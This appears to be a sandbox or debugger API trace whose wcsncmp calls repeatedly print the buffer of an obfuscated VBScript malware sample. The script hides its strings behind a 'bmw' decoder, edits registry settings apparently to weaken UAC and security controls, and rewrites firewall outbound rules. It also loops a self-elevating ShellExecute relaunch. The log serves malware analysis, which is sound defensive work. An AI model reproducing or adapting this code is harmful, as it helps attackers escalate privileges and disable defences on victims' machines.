bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 82 [0222.985] wcsncmp (_String1="DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 55 [0222.985] wcsncmp (_String1="IR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 60 [0222.985] wcsncmp (_String1="R_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 69 [0222.986] wcsncmp (_String1="_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", 